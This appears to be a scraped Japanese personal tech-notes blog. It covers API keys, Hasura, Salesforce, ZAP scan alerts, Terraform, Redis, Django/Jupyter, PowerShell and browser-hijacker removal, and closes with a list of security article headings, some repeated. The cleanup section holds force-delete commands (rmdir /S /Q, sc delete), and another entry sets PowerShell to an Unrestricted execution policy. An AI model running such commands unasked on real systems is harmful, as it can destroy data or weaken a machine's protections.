セキュリティ: 非常に高いセキュリティが必要です。トークンが漏洩した場合、コンテンツを不正に操作される可能性があります。

まとめ

機能	Content Delivery API キー	Content Management API トークン
用途	コンテンツ配信 API へのアクセス	コンテンツ管理 API へのアクセス
役割	公開されたコンテンツの取得	コンテンツの管理 (作成、更新、削除など)
アクセス権	読み取り専用	読み取り/書き込み
セキュリティ	比較的低い	非常に高い

注意点

Wordpress: 脆弱性

Mon, 14 Oct 2024 00:00:00 +0000

Wordpress脆弱性

Advanced Custom Fields (ACF)

https://rocket-boys.co.jp/7886/

Hasura

Mon, 09 Sep 2024 00:00:00 +0000

Hassura

PostgreSQL サーバーから自動的に GraphQL サーバーを建てられる, PostgreSQL サーバーがあればすぐに使える
GraphQL サーバーを実装する手間が省ける
他の自前で用意したGraphQLサーバーとHasuraを統合してリクエストをHasura一つにお任せすることも可能
ページングや集計クエリなども自動で生成される
実際に発行される SQL がすぐにわかる
認証認可の仕組みがある

ドキュメント

https://hasura.io/learn/ja/graphql/hasura/introduction/

記事

AppExchange

Mon, 19 Aug 2024 00:00:00 +0000

AppExchange

ISV / OEM パートナー

組織

パートナービジネス組織（Partner Business Org で PBO とも呼ばれる）
パッケージ開発組織
スクラッチ組織（Scratch Org）
Trialforce ソース組織（Trialforce Source Org で TSO とも呼ばれる）
顧客組織

開発

LMA

環境ハブ

セキュリティレビュー

Salesforce のアプリケーション審査

手順:

準備
申請
注文書と手順書
公開
年次更新

MavensMate

Lightning Experience

Aura コンポーネント

コンポーネント:

Visualforce
Aura(いわゆるオーラ) (Aura コンポーネントの中から LWC を呼び出すことはできるが、LWC の中から Aura コンポーネントを呼び出すことはできない。)
Lightning Web Conponent(LWC)

外部のデータソースを呼ぶには

Apex

Aura コンポーネントから Salesforce 以外の外部データを呼び出すには、以下の手順を参考にしてください：

Apex コントローラーを使用する:

Apex クラスを作成し、外部 API を呼び出すメソッドを定義します。例えば、HttpRequestとHttpResponseクラスを使用して外部 API にリクエストを送信し、レスポンスを処理します。

public class ExternalDataController {
@AuraEnabled
public static String getExternalData() {
Http http = new Http();
HttpRequest request = new HttpRequest();
request.setEndpoint('https://api.example.com/data');
request.setMethod('GET');
HttpResponse response = http.send(request);
return response.getBody();
}
}

Aura コンポーネントで Apex メソッドを呼び出す:

さくらのレンタルサーバー

Mon, 19 Aug 2024 00:00:00 +0000

さくらのレンタルサーバー

サイトセキュリティチェック

Mon, 22 Jul 2024 00:00:00 +0000

サイトセキュリティチェック

Mozilla: https://observatory.mozilla.org/
トレンドマイクロ: https://global.sitesafety.trendmicro.com/?cc=jp
Google: https://www.virustotal.com/gui/home/upload

OWASP Zap

Docker 版 OWASP ZAP を M1 Mac で動かす。

問題:

: Cookie No HttpOnly Flag [10010]
: Re-examine Cache-control Directives [10015]
: Cross-Domain JavaScript Source File Inclusion [10017]
: Missing Anti-clickjacking Header [10020]
: X-Content-Type-Options Header Missing [10021]
: [Information Disclosure - Suspicious Comments]https://www.zaproxy.org/docs/alerts/10027/
: [Cookie Poisoning]https://www.zaproxy.org/docs/alerts/10029/
: User Controllable HTML Element Attribute (Potential XSS) [10031]
: Strict-Transport-Security Header Not Set [10035]
: Content Security Policy (CSP) Header Not Set [10038]
: Secure Pages Include Mixed Content [10040]
: Storable and Cacheable Content [10049]
: Cookie without SameSite Attribute [10054]
: Permissions Policy Header Not Set [10063]
: Timestamp Disclosure - Unix [10096]
: Modern Web Application [10109] (対応しなくてもよい)
: Dangerous JS Functions [10110]
: Session Management Response Identified [10112]
: Absence of Anti-CSRF Tokens [10202]
: Sub Resource Integrity Attribute Missing [90003]
: Charset Mismatch [90011]

VIRUSTOTAL

https://www.virustotal.com/gui/home/upload

SUURI

https://sitecheck.sucuri.net/

Swiper

Mon, 15 Jul 2024 00:00:00 +0000

swiper

https://github.com/nolimits4web/swiper
【最新】Swiper の使い方・カスタマイズを解説！サンプルやオプション 15 個付きー基礎から応用までー (Swiper v8.1.4)
JVNDB-2021-005554 swiper における脆弱性 (6.5.1)(情報を取得される、情報を改ざんされる、およびサービス運用妨害 (DoS) 状態にされる可能性があります。)

MS Graph

Sun, 02 Jun 2024 00:00:00 +0000

Micsoft Graph

OAuth2

client_credtials:

1
2
3
4
5
6


curl -d "client_id=クライアントID" \
 -d "scope=https%3A%2F%2Fgraph.microsoft.com%2F.default" \
 -d "client_secret=クライアントシークレット" \
 -d "grant_type=client_credentials" \
 -H "Content-Type: application/x-www-form-urlencoded" \
 -X POST https://login.microsoftonline.com/テナントID/oauth2/v2.0/token

authorization code:

Microsoft Graph API を Ruby で操作してみる

AWS: Billing

Mon, 08 Apr 2024 00:00:00 +0000

AWS: Billing

Terraform: Import

Sun, 07 Jan 2024 00:00:00 +0000

Terrafrom Import

ドメイン認証

1

# env $(cat ../.env|xargs) terraform -chdir=prod import 'module.ses.aws_route53_record.domain_identity["yourdomain.com"]' Z01825913VYOI2NNQZL0A__amazonses.yourdomain.com_TXT

S3

1
2
3


export RES=module.s3_backup.aws_s3_bucket.this
export BUCKET=mybucket-prod
env $(cat ../.env|xargs) terraform -chdir=prod import $RES $BUKET

redis

Fri, 14 Jul 2023 00:00:00 +0000

Elasic Cache for Redis

バージョン

1
2
3
4
5


$ redis-cli --version
redis-cli 5.0.7

$ redis-server -v
Redis server v=5.0.7 sha=00000000:0 malloc=jemalloc-5.2.1 bits=64 build=66bd629f924ac924

接続:

1

REDIS_URL=redis://mycloud-stage-redis-nc.sigrvp.ng.0001.apne1.cache.amazonaws.com:6379/0

1
2
3


$ export $(cat .env|xargs)
$ redis-cli -u $REDIS_URL PING
PONG

Python

redis-py: https://github.com/redis/redis-py
django-redis: https://github.com/jazzband/django-redis
channels_redis: https://github.com/django/channels_redis

クラスターモードへの接続

Cluster Client

1
2
3
4
5
6
7
8
9


import logging
from redis.cluster import RedisCluster

ENDPOINT = "mycloud-stage-redis-test.sigrvp.clustercfg.apne1.cache.amazonaws.com"
logging.basicConfig(level=logging.INFO)
redis = RedisCluster(host=ENDPOINT, port="6379")

if redis.ping():
 logging.info("Connected to Redis")

django-redis:

jupyter: Django

Fri, 05 May 2023 00:00:00 +0000

Jupyter: Django

準備

django_extensions , notebookを入れておく

settgins.py:

1

INSTALLED_APPS += ['django_extensions']

VSCode

VSCodeでJupyterのPythonランタイムを選んでから以下を実行する
環境変数で、DJANGO_ALLOW_ASYNC_UNSAFE=true をセットしておく(.envとか)

1
2
3
4
5
6


import sys, os, django

BASE_DIR = "path_ot_manage_py"
sys.path.insert(0, BASE_DIR)
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "app.settings")
django.setup()

リモートサーバー

autossh でポートフォワード

PCの 8.8.8.8 -> リモート(EC2とか)の 8.8.8.8 にフォワードする:

1

autossh -M 0 -F .secrets/ssh.ec2.conf server -N -L 8888:localhost:8888 -4

カーネル起動

1

DJANGO_ALLOW_ASYNC_UNSAFE=true python manage.py shell_plus --notebook

URLが表示されるので、ブラウザでアクセスする

macOS: ls: .: Operation not permitted

Tue, 02 May 2023 00:00:00 +0000

macOS: ls: .: Operation not permitted

このエラーは、macOSのセキュリティ機能によって、ターミナルのコマンドが特定のディレクトリに対して制限されている可能性があります¹²。例えば、DownloadsやDocumentsなどのディレクトリは、プライバシー保護のためにアクセス権が制限されています²。

この場合、システム環境設定から、ターミナルに対してフルディスクアクセスを許可する必要があります¹²。具体的な手順は以下の通りです。

システム環境設定を開きます。
セキュリティとプライバシーを選択します。
プライバシータブをクリックします。
左側のメニューからフルディスクアクセスを選択します。
鍵のアイコンをクリックしてロックを解除します。
パスワードを入力します。
+ボタンをクリックしてターミナルを追加します。
ターミナルを再起動します。

これで、lsコマンドなどが正常に動作するはずです。試してみてください。

ソース: Bing との会話 2023/5/3

(1) macOS の「Operation not permitted」を回避する【du/ls/mv/cp …. https://qiita.com/KEINOS/items/0366f1c281b574a79cfb.
(2) ターミナルでコマンド実行時に「Operation not permitted」が出 …. https://qiita.com/Tatsu88/items/f50f850b0c8f4a2c1bf2.
(3) unix - ls: Operation not Permitted - Stack Overflow. https://stackoverflow.com/questions/25717501/ls-operation-not-permitted.
(4) 突然の「Operation not permitted」-Dockerが採用する …. https://www.creationline.com/lab/46861.

設定 > プライバシーとセキュリティ

> フルディスクアクセス

AWS CodeWhisperer & IAM Identity Center

Sat, 15 Apr 2023 00:00:00 +0000

AWS CodeWhisperer & IAM Identity Center

CodeWhisperer

IAM Identity Center:

IAM Identity Centerを有効にする
ユーザーを追加する
ユーザーのメアド認証
パスワードリセットをメアドに送り、パスワード設定してログイン可能にする

CodeWhisperer:

Codewhiper の利用を開始する
CodeWhispererを IAM Identity Centerのアプリケーションに登録する
IAM Identity Centerで登録したユーザーを CodeWhispererで使えるようにする

VSCode:

AWS Toolkit プラグインを入れる
CodeWhisperer の利用を開始:Connect using AWS Identity Center で
AWS Identity Center URLを入力 (https://x-xxxxxxx.awsapps.com/start)
AWS Toolkitにアクセストークンを取得( 認証コードをブラウザに入力して、IAM Identity Centerにログイン)

資料

PowerShell

Sat, 01 Aug 2015 00:00:00 +0000

PowerShell

実行権限

WindowsでPowerShellスクリプトの実行セキュリティポリシーを変更する

PS C:\WINDOWS\system32> Get-ExecutionPolicy
RemoteSigned

PS C:\WINDOWS\system32> Set-ExecutionPolicy Unrestricted

Set-ExecutionPolicy : Windows PowerShell により実行ポリシーは正常に更新されましたが、設定は範囲がより明確に定義されたポリシーで上書きされました。この上書きにより、シェルで現在有効な実行ポリシー RemoteSigned が保持されます。
実行ポリシーの設定を表示するには、「Get-ExecutionPolicy -List」と入力してください。詳細については、"Get-Help Set-ExecutionPolicy" を参照してください。
発生場所 行:1 文字:1
+ Set-ExecutionPolicy Unrestricted
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (:) [Set-ExecutionPolicy], SecurityException
+ FullyQualifiedErrorId : ExecutionPolicyOverride,Microsoft.PowerShell.Commands.SetExecutionPolicyCommand

PS C:\WINDOWS\system32> Get-ExecutionPolicy -List
Scope ExecutionPolicy
----- ---------------
MachinePolicy Undefined
UserPolicy Undefined
Process Undefined
CurrentUser RemoteSigned
LocalMachine Unrestricted

How successfully change Execution policy and enable execution of Powershell scripts

Browser Hijacker

Wed, 22 Jul 2015 00:00:00 +0000

Delta Homes系の対応

WindowsMangerProtect

1
2
3
4


C:\WINDOWS\system32>sc delete WindowsMangerProtect
[SC] DeleteService SUCCESS

C:\WINDOWS\system32>rmdir /S /Q "C:\ProgramData\WindowsMangerProtect"

IHProtect Service

1
2
3
4
5
6
7
8
9


C:\WINDOWS\system32>sc delete "IHProtect Service"
[SC] DeleteService SUCCESS

C:\WINDOWS\system32>rmdir /S /Q "C:\Program Files (x86)\MiuiTab"
C:\Program Files (x86)\MiuiTab\msvcp110.dll - アクセスが拒否されました。
C:\Program Files (x86)\MiuiTab\msvcr110.dll - アクセスが拒否されました。
C:\Program Files (x86)\MiuiTab\ProtectService.exe - アクセスが拒否されました。

C:\WINDOWS\system32>rmdir /S /Q "C:\Program Files (x86)\MiuiTab"

セキュリティ on hdknr blog

ChatGPTのコード実行環境にDNSトンネリングによるデータ漏洩の脆弱性が発覚

Claude Code のソースコードが npm のソースマップから全公開された件

Pay2Key の Linux ランサムウェアが x64/ARM64 サーバーを標的に — 防御機構を無効化する高度な手口

PyPI公式パッケージ telnyx がサプライチェーン攻撃で汚染 — TeamPCPによるWAVステガノグラフィ攻撃の全容

ForceMemo: GitHub アカウントを乗っ取り Python リポジトリにバックドアを仕込む新型攻撃

攻撃の概要

GlassWorm による初期侵入

force-push による履歴改ざん

CVE-2026-32746: GNU Inetutils telnetd に32年間潜んでいた認証前リモートコード実行の脆弱性

Palo Alto Cortex XDR の振る舞い検知ルールが解読・バイパスされた脆弱性の全容

1Password Unified Access：AIエージェント時代のシークレット管理が本格始動

何が発表されたのか

なぜ必要なのか：.env 問題

各社との連携内容

Anthropic（Claude Code / Cowork / ブラウザ拡張）

Cursor（Hooks による just-in-time シークレット）

Microsoft Agent Governance Toolkit：AIエージェントのセキュリティを4つの柱で守るOSSツールキット

背景：なぜ AI エージェントにガバナンスが必要か

4つの柱

1. Policy Engine（ポリシーエンジン）

GitHub で見つけた「便利ツール」を解析したらマルウェアだった話：偽 OpenClaw インストーラーの実態

対象リポジトリの特徴

ZIP の中身

Kali Linux × Ollama × MCP — 完全ローカルで動く AI ペンテスト環境の構築

構成要素

マッキンゼーの社内AI「Lilli」がSQLインジェクションで完全突破された件

Lilli とは

Lilli のアーキテクチャ

攻撃の経緯

脆弱性管理の次の時代 ── Exposure Management とは何か

CVSS とは何か

従来の脆弱性管理の限界

中国政府が OpenClaw に緊急セキュリティ警告：AI エージェントの安全な運用とは

何が起きたのか

CNCERT が指摘した主なリスク

1. アーキテクチャ設計上の問題

2. デフォルト設定の脆弱性

3. プラグインエコシステムの危険性

4. Web ベースの攻撃

5. 重要データの誤削除

CNCERT の推奨対策

AI エージェント全般への教訓

Claude Codeの「セキュリティ%表示」は対策ではなく"お気持ち表示"？ 本当にやるべきセキュリティ設定

話題になった「パーセンテージ表示」

セキュリティ専門家の反論:「お気持ち表示」

Claude Codeに本当に効くセキュリティ対策

1. サンドボックスを有効にする

2. denyルールで危険なコマンドをブロック

3. 機密ファイルへのアクセスを遮断

Vibe Hacking とは何か：AI が変えるサイバー攻撃の新潮流

Vibe Hacking とは

具体的な脅威

AI 生成マルウェア

Flat-Pack Malware

国家レベルの活用

なぜ危険なのか

攻撃コストの劇的な低下

検出回避能力の向上

Vibe Coding で作られたアプリの脆弱性

対策のポイント

AI によるコードレビューの自動化

GitHub Actions スクリプトインジェクション完全解説 — ${{ }} を run に書いた瞬間、攻撃者にシェルを渡している

GitHub Actions スクリプトインジェクション完全解説 — ${{ }} を run に書いた瞬間、攻撃者にシェルを渡している

何が危険なのか — 30秒で理解する

GitHub Actionsスクリプトインジェクション完全解説 — ${{ }}をrunに書いた瞬間、攻撃が始まる

GitHub Actions スクリプトインジェクション完全解説 — ${{ }} を run に書いた瞬間、攻撃が始まる

スクリプトインジェクションとは何か

攻撃の実践例

攻撃 1: PR タイトルによるインジェクション

上場企業3,700社のSPF/DMARC設定を全調査 — 「p=none」が半数、日本のメール認証の現在地

上場企業3,700社のSPF/DMARC設定を全調査 — 「p=none」が半数、日本のメール認証の現在地

メール認証の基礎 — SPF・DKIM・DMARC の仕組み

SPF（Sender Policy Framework）

DKIM（DomainKeys Identified Mail）

DMARC（Domain-based Message Authentication, Reporting and Conformance）

FIDO2 認証（パスキー）の仕組み — パスワードを「構造的に不要にする」技術

FIDO2 認証（パスキー）の仕組み — パスワードを「構造的に不要にする」技術

パスワード認証の根本的な問題

FIDO2 の設計思想 — 「秘密を送らない」

Claude Codeの「セキュリティ%表示」は対策ではなく"お気持ち表示"？本当にやるべきセキュリティ設定

GitHub Actions スクリプトインジェクション完全解説 — `${{ }}` を `run` に書いた瞬間、攻撃者にシェルを渡している

GitHub Actions スクリプトインジェクション完全解説 — `${{ }}` を run に書いた瞬間、攻撃が始まる